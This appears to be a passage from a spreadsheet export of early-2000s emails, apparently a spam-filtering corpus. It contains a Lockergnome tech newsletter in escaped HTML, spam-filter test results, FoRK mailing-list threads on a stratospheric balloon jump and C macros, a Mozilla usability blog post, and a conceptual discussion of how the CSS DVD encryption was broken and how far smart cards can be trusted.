 asked for your pixel-perfect creations. I have yet to receive one.
 Perhaps you've been waiting for the right motivation? How about a
 nice little contest involving some of the most powerful sites on
 the Internet? Here's the deal: you create five (or more) icons
 between now and the end of July 2002, upload them to your [FREE]
 DeviantArt account (under Contests / Axialis Icon Contest), and
 one of the five judges may pick it. The panel includes: myself,
 MattEO from &lt;a href="http://www.deviantart.com/"&gt;DeviantArt&lt;/a&gt;,
 KarmaGirl from &lt;a href="http://www.wincustomize.com/"&gt;WinCustomize&lt;/a&gt;, Voodoo from
 &lt;a href="http://www.neowin.net/"&gt;Neowin&lt;/a&gt;, and Marc from
 Axialis. We'll each pick our favorite set. The winners will not
 only receive one copy of IconWorkshop Corporate Edition, but some
 of their icons will get bundled with a future version of the
 software! Ownership is retained by the original author, so don't
 hold back. Here's your chance at fame and fortune. Or, at least
 fame and free software.
 &lt;p&gt;
 Ah, the life of a software junkie! Pieter just released the new
 (unofficial) &lt;a href="http://www.frysianfools.com/ggsearch/"&gt;Google SearchTool&lt;/a&gt;
 today. It's much more convenient than the official toolbar (sorry,
 I just don't like browser add-ons). I also gave
 &lt;a href="http://www.outertech.com/product.php?product=3"&gt;Cacheman&lt;/a&gt;
 another go; I haven't used it since Windows 98. It's always been a
 great piece of shareware, but I didn't realize it was THIS good.
 The speed increase has been quite noticeable (even on Storm Shadow,
 my P4 2.5GHz machine). Outer Technologies is brilliant. And so is
 &lt;a href="http://www.repligator.com/"&gt;Repligator 9.0&lt;/a&gt;. It gives
 me access to instant special effects - a one-stop shop for digital
 photo fun. I'm still debating whether or not to install the latest
 Java runtimes. It seems to be unobtrusive on my test machine,
 which is good to see; I don't want browser integration, I just
 wanna run that awesome ASCII Art program. Oh, and "12 Mistakes
 Executives Make When Planning Web Strategy" is available for FREE
 with the purchase of ANY &lt;a href="http://www.gnometomes.com/"&gt;GnomeTome&lt;/a&gt; (including our 50
 freshly-released OS X tips). Go grab it if your boss doesn't know
 as much as s/he should.
 &lt;p&gt;
 There's a little bit of Oingo Boingo on &lt;a href="http://mp3.lockergnome.com/"&gt;Emusic&lt;/a&gt; now. They inked a
 deal with Universal Music Group today - and I'm not paying any
 more to get access to even &lt;a href="http://mp3.lockergnome.com/"&gt;more MP3s&lt;/a&gt;. This is the ONLY
 way to go, and I hope and pray that more record labels will
 eventually catch on to the craze. The Internet is more than a
 place for a pseudo-interactive pamphlet; the Internet fosters
 knowledge; the Internet is still in its infancy; the Internet has
 encouraged creativity and commerce. The one thing the Internet is
 NOT: a fad. Its potential is limitless, as long as it remains
 flexible and not controlled by any one company. This
 &lt;a href="http://zdnet.com.com/2100-1107-941111.html"&gt;Palladium&lt;/a&gt;
 thing has got me more than a little spooked. It, combined with the
 service-oriented OS, could very well be the thing that drives
 people away from the Windows platform in droves (as much as I hate
 to admit it). Software and music pirates unwittingly created DRM.
 I best not find out that you're part of the problem.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&lt;B&gt;Groone's Recipe Holder v1.1.0 [8.2M] W9x/2k/XP FREE&lt;/b&gt;
 &lt;P&gt;
  &lt;A CLASS=URL HREF="http://www.groonesworld.com/rholder.htm"&gt;http://www.groonesworld.com/rholder.htm&lt;/A&gt;
 &lt;P&gt;
 {Recipe lister} The best thing about this recipe holder? The
 conversion calculator. I've always wondered how many teaspoons
 were in a gallon. There are a few delicious recipes already
 included, to help you start your collection of favorites.
 Everything is nicely divided into categories, too. Need a salad?
 Then click &amp;quot;Soups &amp;amp; Salads.&amp;quot; (Easy!) You can also make shopping
 lists. The printing capability is nice too, since I'm assuming
 most of you don't keep your computer next to the stove. &amp;quot;If you
 have an up-to-date computer with Win2000, XP, or 98SE with the
 latest version of IE, then you can download the version with no
 runtime support since your computer has all the necessary files.&amp;quot;
 &lt;p&gt;&lt;br&gt;
 &lt;B&gt;SolarInfo v1.0 [1.1M] FREE&lt;/b&gt;
 &lt;P&gt;
  &lt;A CLASS=URL HREF="http://www.sulaco.co.za/downloads.htm"&gt;http://www.sulaco.co.za/downloads.htm&lt;/A&gt;
 &lt;P&gt;
 {Sun, moon, and planets} Why is it all the other planets have
 really cool names for their respective moon(s), but Earth's is
 simply referred to as &amp;quot;moon?&amp;quot; We should change it to something
 catchier, like &amp;quot;Joey Joe-Joe Junior Shabbadu.&amp;quot; Don't mind me, I
 was just looking at this new application. It shows a graphical
 representation of every planet in our solar system (as opposed to
 every planet in the Hoth system) and its moons. It also provides
 detailed information such as the planet's distance from the sun,
 its volume, mass, and gravity in relation to Earth. What I found
 most interesting was how long a single &amp;quot;day&amp;quot; lasts on different
 planets. Did you know one day on Pluto is equal to six days on
 Earth? I guess he chased Chip and Dale around the Christmas tree
 for longer than we thought.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Outlook 2002, without a server!" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;/table&gt;
 &lt;!-- SYSTEM --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSYSTEM&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;B&gt;TightVNC v1.2.4 [660k] W9x/2k/XP FREE&lt;/b&gt;
 &lt;P&gt;
  &lt;A CLASS=URL HREF="http://www.tightvnc.com/"&gt;http://www.tightvnc.com/&lt;/A&gt;
 &lt;P&gt;
 &amp;quot;VNC (an abbreviation for Virtual Network Computing) is a great
 client / server software package allowing remote network access to
 graphical desktops. With VNC, you may allow yourself to access
 your machine from everywhere provided that your machine is
 connected to the Internet. VNC is free (released under the GNU
 General Public License) and it's available on most platforms. The
 original VNC distribution can be obtained at the AT&amp;amp;T research
 labs site. Here you can find enhanced version of VNC, called
 TightVNC (grown from the VNC Tight Encoder project), which is
 optimized to work over slow network connections such as low-speed
 modem links. While original VNC may be very slow when your
 connection is not fast enough, with TightVNC you can work remotely
 almost in real time in most environments. Besides bandwidth
 optimizations, TightVNC also includes many other improvements,
 optimizations and bug fixes over VNC.&amp;quot;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size="1"&gt;&lt;B&gt;Full PDF Books&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001829.html"&gt;Poor Richard's Web&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001827.html"&gt;Internet Promotions&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001804.html"&gt;E-Mail Publishing&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001830.html"&gt;Web Site Makeover&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001803.html"&gt;Websites Made Easy&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001825.html"&gt;Online Communities&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001826.html"&gt;Home Networking&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001828.html"&gt;Internet Recruiting&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001824.html"&gt;Online Branding&lt;/A&gt;&lt;BR&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;B&gt;Pop-Up Menu Navigation Software&lt;/b&gt;
     &lt;br&gt;Scribbled by Pat Wong
 &lt;P&gt;
  &lt;A CLASS=URL HREF="http://popup.jscentral.com/"&gt;http://popup.jscentral.com/&lt;/A&gt;
 &lt;P&gt;
 I found some really cool software to generate Web site navigation
 menus, and I thought you might be interested in learning about it.
 There are several examples on the company's site, as well as on my
 own. Here's a small write-up about it; perhaps you'd be interested
 in running this in a future Lockergnome issue? We've all seen a
 lot of really cool site navigation menus, with pop-up text, neat
 mouseover effects, and the like. Most of them require a
 combination of HTML and JavaScript to build, which is expertise
 that goes way beyond some of us. At last, it's possible to easily
 generate just such a menu with some very user-friendly screens to
 enter the data you want to use.
 &lt;P&gt;
 Pop-Up Menu comes in a freeware version, or you can get a fully
 licensed version ($34.95 for a Home User license / $129.95 for the
 Web Designer license). The biggest difference? With the licensed
 version, you get the ability to save a menu you've generated so
 you can modify it later. Your only alternative, if you want to
 make even a simple change to a menu generated by the freeware
 version, is to create the whole menu again from scratch (or diving
 into the nuts and bolts of the code and modifying that). Be
 forewarned: The JavaScript reads like a novel, so modifying that
 could potentially be a nightmare. I decided to buy the fully
 licensed version and I'm really glad I did. Sorry if I sound like
 a commercial for the company; I don't work for them or stand to be
 compensated in any way for recommending them. I just think this
 menu system is the greatest thing to come along in a while.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 class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;Avoid intruders in your online space:&lt;/b&gt; Our choice to protect your privacy! Complete browsing security. Clear cache, cookies, history and more with the click of your mouse. Leave no telltale tracks behind!" Get a virtual Panic Button for your PC! &lt;a href="http://hop.clickbank.net/?lgnome/panicware"&gt;Try it today&lt;/a&gt;!
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeFAVORITE&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;B&gt;Calculator&lt;/b&gt;
     &lt;br&gt;Unearthed by a Gnomie
 &lt;P&gt;
  &lt;A CLASS=URL HREF="http://www.calculator.com/"&gt;http://www.calculator.com/&lt;/A&gt;
 &lt;P&gt;
 {Calculate it} Calculators aren't just for adding and subtracting
 numbers or spelling silly phrases by turning the calculator upside
 down. How about figuring out the financing on your new car? What
 about the seeding rates for your wheat farm? Perhaps you
 programmers out there need a nice HEX calculator. And, of course,
 what football fan wouldn't like to calculate the passing rates for
 his or her favorite quarterback? If it seems like I'm all over the
 map here, it's because this site provides links to all kinds of
 calculator sites for all kinds of people. Trust me: it all adds up
 to a unique and useful site.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&lt;table align="right"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size="1"&gt;&lt;B&gt;Our Tip eBooks&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;
 &lt;a target="_blank" href="http://www.gnometomes.com/tome/000628.html"&gt;Microsoft Office Tips&lt;/a&gt;&lt;BR&gt;
 &lt;a target="_blank" href="http://www.gnometomes.com/tome/000627.html"&gt;PC Productivity Tips&lt;/a&gt;&lt;BR&gt;
 &lt;a target="_blank" href="http://www.gnometomes.com/tome/000626.html"&gt;Cool Internet Tips&lt;/a&gt;&lt;BR&gt;
 &lt;a target="_blank" href="http://www.gnometomes.com/tome/000625.html"&gt;Windows 2000 Tips&lt;/a&gt;&lt;BR&gt;
 &lt;a target="_blank" href="http://www.gnometomes.com/tome/000623.html"&gt;Windows XP Tips&lt;/a&gt;&lt;BR&gt;
 &lt;a target="_blank" HREF="http://www.gnometomes.com/tome/001106.html"&gt;Top 50 Fun Sites&lt;/A&gt;&lt;BR&gt;
 &lt;a target="_blank" HREF="http://www.gnometomes.com/tome/001104.html"&gt;Must-Know Terms&lt;/A&gt;&lt;BR&gt;
 &lt;a target="_blank" HREF="http://www.gnometomes.com/tome/001105.html"&gt;Top 50 Useful Sites&lt;/A&gt;&lt;BR&gt;
 &lt;a target="_blank" HREF="http://www.gnometomes.com/tome/001099.html"&gt;Top 75 Tech Sites&lt;/A&gt;&lt;BR&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 Who knows how to thwart false charges? Lockergnomie Steve
 Lafferty: &amp;quot;In a recent article over the PayPal issue, it was
 stated that when using a credit card illegally, the owner of that
 card is responsible for the first $50.  However, sometging that
 very few people know about is that there is a US Federal provision
 in the banking industry called 'Reg E' (Regulation E / Electronic
 Funds Transfer). This stipulates that all transactions will err in
 favor of the customer (account holder). This means that if your
 'bank card' is used without your permission, you are not
 responsible for any of the charges. My suggestion is never to use
 a credit card - and only use your bank debit card. That way, if
 someone steals your number, you are not liable for any of the
 charges.&amp;quot; For more information, please refer to Section 205 on
 FEDERALRESERVE.GOV. Obviously, this tip only applies to people
 living in the USA. If you haven't been watching your statements
 like a hawk lately, you'd be wise to start soon. Identity theft is
 a growing concern. When my wallet was stolen, I found
 IDENTITYTHEFT.ORG to be a godsend.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href="http://www.lockergnome.com/issues/daily/20020710.html"&gt;http://www.lockergnome.com/issues/daily/20020710.html&lt;/a&gt;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HREF="http://www.gnomedex.com/"&gt;$99 Tech Conference&lt;/A&gt;&lt;br&gt;
 &lt;p&gt;
 &lt;center&gt;
 &lt;a href="http://www.gnomedex.com/" target="_blank"&gt;&lt;img alt="See You in August!" src="http://chris.pirillo.com/archives/Gnomedex_Banner_going.gif" width="120" height="60" border="0"&gt;&lt;/a&gt;
 &lt;/center&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;a href="http://store.lockergnome.com"&gt;The GnomeSTORE&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/recommend.html"&gt;Tell a Friend About Us!&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/submit.html"&gt;Suggest a Feature&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/advertise.html"&gt;Advertise With Us&lt;/a&gt;&lt;br&gt;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&lt;p&gt;&amp;nbsp;&lt;p&gt;&lt;table cellpadding="0" cellspacing="0" border="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;MP3 SOFTWARE&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=548557/"&gt;Havas MP3 Pro&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=234527/"&gt;Magix MP3 Maker&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=278075/"&gt;Ejay MP3&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=468032/"&gt;Audiostation 5.0&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=588415/"&gt;Jack The MP3 Ripper&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=599956/"&gt;Pearson MP3 Maker&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=472433/"&gt;Steinberg My MP3&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=555517/"&gt;MusicMatch Jukebox 7.0&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=20635/"&gt;Hip Hop E-jay Record&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=393896/"&gt;MP3-Wolf&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=409500/"&gt;MP3 Maker Gold&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=273932/"&gt;The MP3 Wizard&lt;/A&gt;&lt;BR&gt;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the story of the ugly shoe unfold before our very eyes. This footwear was outcast from the group weeks ago, and has been very depressed ever since. Pity my shoe.
 &lt;p&gt;
 &lt;a href="http://images.lockergnome.com/images/video/lone.shoe.WMV"&gt;The Lone Shoe&lt;/a&gt;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Brilliant Mistakes --&gt;
 Exercise extends your life by ten years, but you spend 15 of them doing it.
 &lt;/font&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: *****SPAM*****
</t>
  </si>
  <si>
    <t xml:space="preserve">Here's clarification of why I did:
 First test results using tokenizer.Tokenizer.tokenize_headers()
 unmodified. 
 Training on 644 hams &amp; 557 spams
       0.000  10.413
       1.398   6.104
       1.398   5.027
 Training on 644 hams &amp; 557 spams
       0.000   8.259
       1.242   2.873
       1.242   5.745
 Training on 644 hams &amp; 557 spams
       1.398   5.206
       1.398   4.488
       0.000   9.336
 Training on 644 hams &amp; 557 spams
       1.553   5.206
       1.553   5.027
       0.000   9.874
 total false pos 139 5.39596273292
 total false neg 970 43.5368043088
 Second test results using mboxtest.MyTokenizer.tokenize_headers().
 This uses all headers except Received, Data, and X-From_.
 Training on 644 hams &amp; 557 spams
       0.000   7.540
       0.932   4.847
       0.932   3.232
 Training on 644 hams &amp; 557 spams
       0.000   7.181
       0.621   2.873
       0.621   4.847
 Training on 644 hams &amp; 557 spams
       1.087   4.129
       1.087   3.052
       0.000   6.822
 Training on 644 hams &amp; 557 spams
       0.776   3.411
       0.776   3.411
       0.000   6.463
 total false pos 97 3.76552795031
 total false neg 738 33.1238779174
 Jeremy
</t>
  </si>
  <si>
    <t xml:space="preserve">
 EL&gt; On Sun, 8 Sep 2002, CDale wrote:
 &gt;&gt; I agree w/ ya Tom.  That kind of thinking is SO idiotic.  Sure, gays
 EL&gt; So how many of your hetero friends had &gt;3 k lovers?
 So Eugen, how many of your homo friends have -had- 3k lovers?
 In fact, thats a general question for FoRK proper.
 Do you know anyone, outside of meybee Wilt Chamberlin and a few of the
 gang-bang porn queens who -have- had even 1.5k lovers?
 Eegads, if you're hypothesizing numbers like -that- Eugen, you at
 least owe it to FoRK to back that shit up.
 Otherwise we're liable to assume rampant unfounded homophobia and that
 would just be a lose.
 Just a quick assumption here.   I'm not a math geek or anything, but
 assuming 1 lover every day, that would be like at least one lover
 everyday for 8 years and some change.   I don't know about you, but
 very very few of us are -that- lucky (or even close to that lucky)
 and after awhile, even the sexaholics get bored and have to mingle
 something new into their weekends.   You really are assumiing that the
 homosexual population is a) that large in a given area (The meccas
 might qualify, but try finding that kind of homosexual population in
 say, Tulsa, Oklahoma or Manchester, NH (Tho Manchester does have quite
 a few nifty gaybars, but thats a different story)  b) that bored/sex
 obsessed/recreationally free to pursue sex that often, with that many
 partners or that they'd even WANT that many partners.
 Qualify yourself, or at least lower your outrageous numbers.
 =BB
 &gt;&gt; are promiscuous, and so are hets, but I betcha gays are more
 &gt;&gt; AIDSphobic than hets, generally speaking....
 EL&gt; The virus load issue is orthogonal to the fact. Bzzt. Switch on your
 EL&gt; brain, you both. I was mentioning that a subpopulation outside of the sex
 EL&gt; industry is/used to be extremely promiscuous, about two orders of
 EL&gt; magnitude higher than average.
 -- 
 Best regards,
  bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Usability Problems with Mozilla
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.mozillazine.org/weblogs/hyatt/#85409355
 Date: Not supplied
 Blake blogs[1] about how mpt[2] wants Mozilla to look just like MSIE. I have to 
 admit, the evidence is pretty compelling. I recall someone asking me, "Do you 
 really agree with mpt's Top 10 list? He's quoted you at the top of the list!"
 Do I agree that those ten items mpt mentions are the top ten problems? Of 
 course not. No two people will have the same top ten problems. Also keep in 
 mind that mpt and I can agree that something is a problem without necessarily 
 agreeing on the solution to the problem. Maybe we have different ideas 
 regarding how to solve a particular issue, but we at least both believe it is 
 an issue that needs to be addressed. That's something.
 To cover the list specifically:
 - Navigator chrome structure - While I don't necessarily agree with mpt's 
 proposed default configuration, I do agree that the chrome structure is 
 painfully restrictive, and that customizable toolbars need to be implemented in 
 order for us to acquire the flexibility to deal with this problem.
 - Speed - can't argue with this, except to say that cutting out a lot of the 
 useless UI and features from the chrome helps substantially. Reduce bloat, gain 
 speed.
 - Text editing - if you use Chimera on the Mac, you'll see that the textfield 
 widget is easily the most painful part of the entire application. It's buggy, 
 slow, misbehaves, and doesn't edit the way you'd expect. This is IMO Chimera's 
 top usability problem.
 - Message display - Yes. No argument here.
 - Search - Yeah, it's a mess. Don't know if it would be in my top ten, but it's 
 a mess.
 - Menu structure - This gets back to my blog about how the apps should be 
 separated. The menu structure has been complicated in order to deal with 
 multiple applications. A clean separation naturally simplifies the menus (e.g., 
 you can eliminate the New submenu easily).
 - Migration - A problem, but IMO not one of the top ten facing Mozilla.
 - Context menus - mpt complains about two-click context menus, and yet, the OS 
 default on Win32 (overwhelmingly) is to bring up a context menu on a mouse up. 
 If you don't like it, complain about Win32, but don't cite this as a Mozilla 
 usability problem when we're following the conventions of the operating system. 
 (We simply listen for the WM_CONTEXTMENU message. That message fires when Win32 
 wants to fire it.)
 - Validation - Err, no. Not a usability problem. To the average bear, this is 
 completely irrelevant.
 - Preferences - IMO this should be much higher on the list. Preferences are a 
 tangled pathetic mess. Again, separating prefs for individual apps into unique 
 dialogs would simplify things a great deal, but we should also remove nearly 
 half the preferences that exist from the GUI. Mozilla is ridiculously 
 overconfigurable.
 [1] http://www.blakeross.com/archives/2002_08_18_index.html#80418641
 [2] http://mpt.phrasewise.com
</t>
  </si>
  <si>
    <t xml:space="preserve">The USAF had a program in the 1959-1960 in which successful free jumps 
 were made from balloons at up to ~32 km (100,000 ft.). The relevance was 
 astronauts and SR-71 bailouts. This would top that achievement 
 comfortably.
 http://www.wpafb.af.mil/museum/history/postwwii/pe.htm
 Chuck
 On Monday, September 9, 2002, at 11:20 AM, Owen Byrne wrote:
 &gt; John Hall wrote:
 &gt;
 &gt;&gt; Why so fast?  Normal terminal velocity is much slower.
 &gt;&gt;
 &gt; Not at 40,000 m. I found this article 
 &gt; (http://www.wired.com/news/print/0,1294,53928,00.html) :
 &gt;
 &gt; "The last person to try to break the highest free fall record died in 
 &gt; the attempt. In 1965, New Jersey truck driver Nick Piantanida suffered 
 &gt; catastrophic equipment failure when his facemask blew out at 57,000 
 &gt; feet. Lack of oxygen caused such severe brain damage that he went into 
 &gt; a coma and died four months later."
 &gt;
 &gt; And in amongst the flash at
 &gt; http://www.legrandsaut.org/site_en/
 &gt;
 &gt; you can discover that he will break the sound barrier at 35,000 m,
 &gt; presumably reaching top speed somewhere above 30,000.
 &gt;
 &gt; Owen
 &gt;
 &gt;&gt;
 &gt;&gt;&gt; -----Original Message-----
 &gt;&gt;&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 &gt;&gt;&gt; bitbitch@magnesium.net
 &gt;&gt;&gt; Sent: Sunday, September 08, 2002 8:36 AM
 &gt;&gt;&gt; To: (Robert Harley)
 &gt;&gt;&gt; Cc: fork@example.com
 &gt;&gt;&gt; Subject: Re: The Big Jump
 &gt;&gt;&gt;
 &gt;&gt;&gt;
 &gt;&gt;&gt;
 &gt;&gt;&gt; So uh, would this qualify for the Darwin awards if he doesn't make it?
 &gt;&gt;&gt;
 &gt;&gt;&gt; Freaking french people...
 &gt;&gt;&gt;   :-)
 &gt;&gt;&gt; -BB
 &gt;&gt;&gt; RH&gt; Today a French officer called Michel Fournier is supposed to get
 &gt;&gt;&gt;
 &gt;&gt; in a
 &gt;&gt;
 &gt;&gt;&gt; RH&gt; 350-metre tall helium balloon, ride it up to the edge of space (40
 &gt;&gt;&gt;
 &gt;&gt; km
 &gt;&gt;
 &gt;&gt;&gt; RH&gt; altitude) and jump out.  His fall should last 6.5 minutes and
 &gt;&gt;&gt;
 &gt;&gt; reach
 &gt;&gt;
 &gt;&gt;&gt; RH&gt; speeds of Mach 1.5.  He hopes to open his parachute manually at
 &gt;&gt;&gt;
 &gt;&gt; the
 &gt;&gt;
 &gt;&gt;&gt; RH&gt; end, although with an automatic backup if he is 7 seconds from the
 &gt;&gt;&gt; RH&gt; ground and still hasn't opened it.
 &gt;&gt;&gt;
 &gt;&gt;&gt; RH&gt; R
 &gt;&gt;&gt;
 &gt;&gt;&gt; RH&gt; ObQuote:
 &gt;&gt;&gt; RH&gt;   "Veder, si aver si grossi li coglioni, come ha il re di
 &gt;&gt;&gt;
 &gt;&gt; Franza."
 &gt;&gt;
 &gt;&gt;&gt; RH&gt;   ("Let's see if I've got as much balls as the King of France!")
 &gt;&gt;&gt; RH&gt;   - Pope Julius II, 2 January 1511
 &gt;&gt;&gt;
 &gt;&gt;&gt;
 &gt;&gt;&gt;
 &gt;&gt;&gt; --
 &gt;&gt;&gt; Best regards,
 &gt;&gt;&gt; bitbitch                            mailto:bitbitch@magnesium.net
 &gt;&gt;&gt;
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;
 &gt;
 &gt;
 &gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Karl
 &gt; Anderson
 &gt; Sent: Thursday, September 05, 2002 3:50 AM
 &gt; To: bitbitch@magnesium.net
 &gt; Cc: 'fork@example.com'
 &gt; Subject: Re: Re[2]: Java is for kiddies
 &gt;
 &gt;
 &gt; bitbitch@magnesium.net writes:
 &gt;
 &gt; &gt; SL&gt; &lt;snip&gt;
 &gt; &gt; SL&gt; Misc rants about finding jobs, java vs C, what makes a good
 &gt; programmer, etc.
 &gt; &gt; SL&gt; &lt;/snip&gt;
 &gt; &gt; &lt;snip&gt;
 &gt; &gt; SL&gt; Okay, hmm, I thought twice about this, but what the hey,
 &gt; jobs are hard to
 &gt; &gt; SL&gt; come by. There's a company hiring in Mountain View, looking
 &gt; for a few good
 &gt; &gt; &lt;/snip&gt;
 &gt; &gt;
 &gt; &gt; I give Adam an hour or so to come up with an adequate number of
 &gt; &gt; excuses as to why -this- job isn't worth it.  :)
 &gt;
 &gt; http://www.netli.com/careers/index.htm
 &gt;
 &gt; &gt;* Along with your resume, please answer this question: What does
 &gt; this _x0013_C_x0014_ statement do? #define XY(s, m) (&amp;((s *)0)-&gt;m)
 &gt;
 &gt; Besides provide job security?
 This is more useful...
 #define CONTAINING_RECORD(address, type, field) ((type *)( \
                                                   (PCHAR)(address) - \
                                                   (PCHAR)(&amp;((type
 *)0)-&gt;field)))
 Bill
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Secure Sofware Key
</t>
  </si>
  <si>
    <t xml:space="preserve">Bryan Feir [mailto:bryan@sgl.crestech.ca] wrote: 
 &gt;Of course, once one player key was broken, dealing with the rest became
 &gt; a known plaintext attack, and the rest of the player keys went down
 like
 &gt; a row of dominos.
 The actual follow-up to the Xing player break was more interesting than
 that.  The mere knowledge of known plaintext (a corresponding input and
 output) does not necessarily make it trivial to break a properly
 designed systems and/or algorithm. The primary reason it was easy for
 CSS is because the CSS key was only 40-bits, and thereby easy to break
 with exhaustive search attacks.  It was only 40-bits (speculated)
 because of a misunderstanding of the government cryptography export
 rules at the time.
 Even more interesting, to me at least, was that soon after the Xing
 player break, people started studying the CSS algorithm itself.  They
 rapidly found serious design flaws which left the 40-bit CSS algorithm
 with an actual strength of around 23-bits (from memory, and new attacks
 might have further reduced the strength).  This is another great example
 showing why proprietary cryptography algorithms should be viewed with
 the greatest of suspicion.
 On Tue, Sep 03, 2002 at 09:03:40PM -0400, Yannick Gingras wrote:
 &gt; This make me wonder about the relative protection of smart cards.
 They have 
 &gt; an internal procession unit around 4MHz.  Can we consider them as
 trusted 
 &gt; hardware ?  
 Yes and no.  You can put a limited amount of trust in a smart card.
 There have been any number of very clever attacks against smartcards
 (Ross Anderson in the UK has documented quite a few of these), and
 smartcard manufactures are usually one step behind these attacks.  A
 well designed system assumes that a system smartcard will be completely
 compromised at some point, giving an adversary all of the secrets
 contained in the smartcard.  The cryptography industry has developed a
 variety of techniques that can reduce the impact of a compromise,
 including unique keys per smartcard and forward security techniques.
 Luciano Rocha [strange@nsk.yi.org] wrote: 
 &gt; The problem is that that piece of hardware is trustworthy, but the
 rest of
 &gt; the PC isn't, so a cracker just needs to simulate the lock/smart card,
 or
 &gt; peek at the executable after the lock has been deactivated.
 Going back to the original question, once the encrypted material goes
 outside the trusted hardware, it is impossible to "unbreakably" protect
 it.  There may be some mitigation steps you can take, such as the SDMI
 watermarking, but most schemes to date have been easily broken.  
 Another consideration is the value of what you are trying to protect.
 While there is no such thing as unbreakable, adding more cost (both in
 terms of price and hassle-factor) can greatly improve the protection.
 Since you are talking about the use of standard PC workstations, I
 presume what you are trying to protect is not THAT valuable.  I'm afraid
 most security measures don't come for free.
 Michael McKay 
 Director of Software Development 
 mmckay@iscubed.com 
   Information Security Systems &amp; Services Inc. 
   19925 Stevens Creek Blvd. Cupertino, CA 95014 
   Phone: 408.725.7136  x 4138    Fax: 408.973.7239   www.iscubed.com
</t>
  </si>
  <si>
